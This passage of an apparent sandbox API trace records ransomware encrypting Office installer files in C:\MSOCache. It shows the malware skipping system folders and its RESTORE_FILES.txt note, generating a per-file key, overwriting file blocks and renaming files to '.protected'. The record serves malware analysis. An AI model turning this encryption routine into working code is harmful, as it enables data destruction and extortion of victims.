lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.251] CloseHandle (hObject=0xb4) returned 1 [0061.252] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.protected") returned 84 [0061.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.protected")) returned 1 [0061.252] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files") returned -1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files (x86)") returned -1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0061.252] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0061.253] StrStrIW (lpFirst="osetup.dll", lpSrch=".protected") returned 0x0 [0061.253] lstrcmpW (lpString1="osetup.dll", lpString2="RESTORE_FILES.txt") returned -1 [0061.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: 
pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.253] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.254] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0061.254] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0061.254] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0061.254] StrStrW (lpFirst="osetup.dll", lpSrch=".rar") returned 0x0 [0061.254] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0061.254] StrStrW (lpFirst="osetup.dll", lpSrch=".zip") returned 0x0 [0061.254] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.262] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.262] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.262] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.263] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 
lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.267] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.267] CloseHandle (hObject=0xb4) returned 1 [0061.267] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.protected") returned 87 [0061.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.protected")) returned 1 [0061.268] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files") returned -1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files (x86)") returned -1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0061.268] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0061.268] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".protected") returned 0x0 [0061.268] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0061.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.268] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.269] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0061.269] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0061.269] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0061.269] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".rar") returned 0x0 [0061.269] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0061.269] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".zip") returned 0x0 [0061.269] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.285] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.285] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.286] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0061.286] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.298] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.298] CloseHandle (hObject=0xb4) returned 1 [0061.299] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected") returned 89 [0061.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.protected")) returned 1 [0061.299] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files") returned -1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files (x86)") returned -1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0061.299] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0061.299] StrStrIW 
(lpFirst="PidGenX.dll", lpSrch=".protected") returned 0x0 [0061.299] lstrcmpW (lpString1="PidGenX.dll", lpString2="RESTORE_FILES.txt") returned -1 [0061.300] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.300] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.300] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.301] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0061.301] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0061.301] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0061.301] StrStrW (lpFirst="PidGenX.dll", lpSrch=".rar") returned 0x0 [0061.301] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0061.301] StrStrW (lpFirst="PidGenX.dll", lpSrch=".zip") returned 0x0 [0061.301] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.312] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.313] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.313] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.313] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.321] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.321] CloseHandle (hObject=0xb4) returned 1 [0061.321] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected") returned 88 [0061.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.protected")) returned 1 [0061.322] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files") returned -1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files (x86)") returned -1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System 
Volume Information") returned -1 [0061.322] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0061.322] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".protected") returned 0x0 [0061.322] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="RESTORE_FILES.txt") returned -1 [0061.322] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.322] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.322] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.322] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0061.322] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0061.322] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0061.322] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".rar") returned 0x0 [0061.322] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0061.323] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".zip") returned 0x0 [0061.323] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, 
lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.435] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.435] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.435] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.520] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.607] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.607] CloseHandle (hObject=0xb4) returned 1 [0061.607] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected") returned 101 [0061.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.protected")) returned 1 [0061.657] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.657] lstrcmpiW 
(lpString1="ProPlusrWW.msi", lpString2="Windows") returned -1 [0061.657] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="Program Files") returned 1 [0061.657] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="Program Files (x86)") returned 1 [0061.658] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="$Recycle.bin") returned 1 [0061.658] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="System Volume Information") returned -1 [0061.658] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0061.658] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".protected") returned 0x0 [0061.658] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0061.658] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.658] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.673] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.710] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0061.710] StrStrW (lpFirst="ProPlusrWW.msi", lpSrch=".txt") returned 0x0 [0061.710] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0061.710] StrStrW (lpFirst="ProPlusrWW.msi", lpSrch=".rar") returned 0x0 [0061.710] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0061.710] StrStrW (lpFirst="ProPlusrWW.msi", lpSrch=".zip") returned 0x0 [0061.710] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.718] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.718] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.718] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.719] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.739] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.739] CloseHandle (hObject=0xb4) returned 1 [0061.739] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.protected") returned 91 [0061.739] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.protected" 
(normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.protected")) returned 1 [0061.740] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Windows") returned -1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Program Files") returned 1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Program Files (x86)") returned 1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="$Recycle.bin") returned 1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="System Volume Information") returned -1 [0061.740] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0061.740] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".protected") returned 0x0 [0061.740] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0061.740] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.740] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.740] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.740] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0061.740] StrStrW (lpFirst="ProPlusrWW.xml", lpSrch=".txt") returned 0x0 [0061.740] lstrlenW 
(lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0061.740] StrStrW (lpFirst="ProPlusrWW.xml", lpSrch=".rar") returned 0x0 [0061.740] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0061.741] StrStrW (lpFirst="ProPlusrWW.xml", lpSrch=".zip") returned 0x0 [0061.741] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.762] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.762] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, 